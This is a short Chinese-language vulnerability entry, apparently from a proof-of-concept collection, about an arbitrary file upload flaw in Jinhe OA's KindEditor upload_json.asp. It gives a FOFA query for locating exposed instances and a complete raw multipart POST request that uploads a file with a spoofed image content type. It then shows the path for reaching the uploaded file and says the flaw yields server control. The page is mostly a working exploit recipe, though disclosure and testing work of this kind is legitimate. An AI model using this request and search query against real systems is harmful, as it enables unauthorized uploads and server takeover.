跳到主要内容

金和OA_upload_json.asp存在任意文件上传漏洞

金和OA_upload_json.asp存在任意文件上传漏洞

金和OA upload_json.asp存在任意文件上传漏洞,攻击者可通过此漏洞获取服务器权限。

fofa

app="金和网络-金和OA"

poc

POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 338
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------153857212076213662067051609723

-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="localUrl"


-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="imgFile"; filename="hhh.txt"
Content-Type: image/png

hhh
-----------------------------153857212076213662067051609723--

image

访问上传的文件 /c6/KindEditor1/asp/../attached/file/20240103/20240103164534323432.txt

image